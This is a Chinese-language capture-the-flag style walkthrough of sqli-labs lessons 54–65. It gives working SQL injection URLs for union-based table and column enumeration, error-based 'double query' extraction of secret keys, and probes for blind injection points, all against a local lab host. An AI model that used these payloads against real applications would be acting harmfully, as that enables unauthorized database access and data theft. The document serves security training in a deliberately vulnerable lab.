Lesson - 54 GET - Challenge - Union - 10 queries allowed - Variation 1 给你十次测试机会找到key,超了重来,构造“?id=1' order by 3”
http://sql/Less-54/index.php?id=-1%27union%20select%201,2,database()%23
http://sql/Less-54/index.php?id=-1%27union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22%23
爆出字段名为“znkf1mw1w8”这里是随机的
http://sql/Less-54/index.php?id=-1%27union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=%22challenges%22%20and%20table_name=%22znkf1mw1w8%22%23
通过limit 爆出id,sessid,secret_PIRC,tryy
http://sql/Less-54/index.php?id=-1'union select 1,2,secret_PIRC from znkf1mw1w8 %23
最后在secret_PIRC里面取出key:qKGAzqon0W2QMS9v2FseUyQP 答案key是随机的,每次不一样的,还是挺有意思的
Lesson - 55
GET - Challenge - Union - 14 queries allowed
Variation 2
试了好几次才发现闭合的是括号
http://sql/Less-55/index.php?id=1)%20and%201=1%20%23
http://sql/Less-55/index.php?id=-1)%20union%20select%201,database(),3%23
选择database
http://sql/Less-55/index.php?id=-1)%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22%23
,得到fx6gbr241y,
http://sql/Less-55/index.php?id=-1)%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=%22challenges%22%20and%20table_name=%22fx6gbr241y%22%20%23
继续爆出id,sessid,secret_2H0L
http://sql/Less-54/index.php?id=-1'union select 1,2,secret_2H0L from fx6gbr241y %23
后面都一样了得到HI88e74wIfhSuJUojsPZTiup
Lesson - 56 GET - Challenge - Union - 14 queries allowed - Variation 3
·http://sql/Less-56/?id=1%27)%23
试出来是‘')’的构造http://sql/Less-56/?id=-1') union select 1,2,table_name from information_schema.tables where table_schema="challenges"%23
得到ccve4hzkwa
http://sql/Less-56/?id=-1') union select 1,2,column_name from information_schema.columns where table_schema="challenges" and table_name="ccve4hzkwa" %23
爆出id,sessid,secret_PSBF,http://sql/Less-56/?id=-1') union select 1,2,secret_PSBF from ccve4hzkwa %23
成功
Lesson - 57 GET - Challenge - Union - 14 queries allowed - Variation 4
http://sql/Less-57/?id=1%22
成功测试存在注入点,剩下的就不做了,反正方法都一样。
Lesson - 58 GET - challenge - Double Query - 5 queries allowed - Variation 1
http://sql/Less-58/index.php?id=1%27and%20%271%27=%271
,在这一题中测了好久才知道与前面不一样的是loginname和username,俩个不一样的表,所以在测试时靠loginname是没用的,幸亏还有报错显示,可以用双注入查询。http://sql/Less-58/index.php?id=-1' union select 1 from (select+count(*),concat(( database()),floor(rand(0)*2))a from information_schema.tables group by a)b %23
爆出“
Duplicate entry 'challenges1' for key 'group_key' ”那么就可以得到challenges,http://sql/Less-58/index.php?id=-1%27%20union%20select%201,2,3%20from%20(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23
得到表“d7dne5tfys”
http://sql/Less-58/index.php?id=-1%27%20union%20select%201,2,3%20from%20(select%20count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%22d7dne5tfys%22%20limit%202,1),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23
b爆出Duplicate entry 'secret_UZ0Q1' for key 'group_key'剩下的就简单了http://sql/Less-58/index.php?id=-1' union select 1,2,3 from (select count(*),concat((select secret_UZ0Q1 from challenges.d7dne5tfys),floor(rand(0)*2))a from information_schema.tables group by a)b #
在这里需要记住,username和loginname是不一样的库里面的,所以要拿出challenge的数据,需要用challenges.d7dne5tfys表示~~
Lesson - 59 GET - challenge - Double Query - 5 queries allowed - Variation 2 方法是一样的,就不再重复了
http://sql/Less-59/index.php?id=-1 union select 1 from (select+count(*),concat(( database()),floor(rand(0)*2))a from information_schema.tables group by a)b %23
Lesson - 60 GET - challenge - Double Query - 5 queries allowed - Variation 3
http://sql/Less-60/?id=1%22
通过这个发现周围如何构造,http://sql/Less-60/?id=-1%22)%20union%20select%201%20from%20(select+count(*),concat((%20database()),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23
那么接下来继续用双查询注入成功get challenge,剩下的自己做吧
Lesson - 61 GET - challenge - Double Query - 5 queries allowed - Variation 4
输入http://sql/Less-61/?id=1%27
提示"check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')) LIMIT 0,1' at line 1"由此判断周围,"http://sql/Less-61/index.php?id=1%27))%23" http://sql/Less-61/index.php?id=-1%27))%20union%20select%201%20from%20(select+count(*),concat((%20select%20database()),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b%20%23
剩下的自己做吧,都一样。
Lesson - 63 GET - challenge - Blind - 130 queries allowed - Variation 2 http://sql/Less-62/?id=1%27)%20order%20by%203%23
通过这个得到注入点,只能盲注一个个查询了
Lesson - 63 GET - challenge - Blind - 130 queries allowed - Variation 2
http://sql/Less-63/?id=1%27%23
对的
http://sql/Less-63/?id=1%27)%23
错的
注入点知道啦,过程略
Lesson - 64 GET - challenge - Blind - 130 queries allowed - Variation 3
http://sql/Less-64/?id=1"))%23
错的
http://sql/Less-64/?id=1))%23
对的
得到注入点啦,过程略
Lesson - 65 GET - challenge - Blind - 130 queries allowed - Variation 4
http://sql/Less-65/?id=1%22%23
错的
http://sql/Less-65/?id=1%22)%23
对的
过程略
后面的题目。。。。。没了